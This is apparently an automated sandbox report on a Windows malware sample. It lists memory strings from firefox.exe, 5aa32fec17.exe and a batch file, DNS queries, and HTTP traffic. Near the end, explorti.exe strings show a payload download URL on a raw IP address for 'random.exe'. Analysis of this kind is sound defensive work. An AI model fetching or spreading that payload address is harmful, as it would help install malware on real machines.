Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823704652.0000029FD3060000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2901568725.000002196FBF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/accounts equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"winsta0\defaultq equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2901568725.000002196FBF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3231852517.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823432869.0000029FD2C81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: PUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userY equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2821879892.0000029FD2C6E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2821980090.0000029FD2C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: PUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=user` equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823704652.0000029FD3060000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: URL=https://www.youtube.com/account~H equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3330455792.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3233159876.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141555486.00000169D9B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3332787650.00000169D9952000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3398831276.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166300363.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141555486.00000169D9B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3324674203.00000169D16D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3324674203.00000169D16D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3324674203.00000169D16D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3330455792.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3380737606.00000169D1B9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3381137545.00000169CD9B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3332787650.00000169D9952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3385355519.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3411645544.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comtype equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3346404548.00000169CE43E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: kmoz-nullprincipal:{8819dd4f-b125-44b1-94b8-14d53f0ecef8}?https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823704652.0000029FD3060000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823704652.0000029FD3060000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ps://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows^itfW equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/account --attempting-deelevationg equals www.youtube.com (Youtube)
Source: 5aa32fec17.exe, 00000017.00000003.2813243287.0000000002127000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: 5aa32fec17.exe, 00000017.00000003.2813378419.0000000002150000.00000004.00000020.00020000.00000000.sdmp, 5aa32fec17.exe, 00000017.00000003.2813243287.0000000002127000.00000004.00000020.00020000.00000000.sdmp, 5177.bat.23.dr String found in binary or memory: set "URL=https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3346404548.00000169CE43E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sq~moz-nullprincipal:{0ff20b06-08d8-4fb9-b708-544e32be49c5}?https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152110944.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341844231.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: tlsflags0x00000000:www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3412223817.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3172465493.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3331445079.00000169D99EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3231852517.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x.S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3231852517.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xO^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3332787650.00000169D9952000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3398831276.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166300363.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3398831276.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166300363.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3332787650.00000169D9952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152110944.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341844231.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xtlsflags0x00000000:www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900C4F3X-BM-CBT: 1696488253X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581DX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900C4F3X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-cX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 516Connection: Keep-AliveCache-Control: no-cacheCookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
Source: global traffic HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Length: 326Content-Type: text/html; charset=us-asciiDate: Fri, 26 Jul 2024 08:40:17 GMTConnection: closePMUSER_FORMAT_QS: X-CDN-TraceId: 0.9ac2d17.1721983216.12698009Access-Control-Allow-Credentials: falseAccess-Control-Allow-Methods: *Access-Control-Allow-Methods: GET, OPTIONS, POSTAccess-Control-Allow-Origin: *
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 2342Content-Type: text/htmlDate: Fri, 26 Jul 2024 08:44:17 GMTConnection: closePMUSER_FORMAT_QS: X-CDN-TraceId: 0.2aac2d17.1721983457.d93b1cfAccess-Control-Allow-Credentials: falseAccess-Control-Allow-Methods: *Access-Control-Allow-Methods: GET, OPTIONS, POSTAccess-Control-Allow-Origin: *
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/cost/random.exe
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/cost/random.exeW
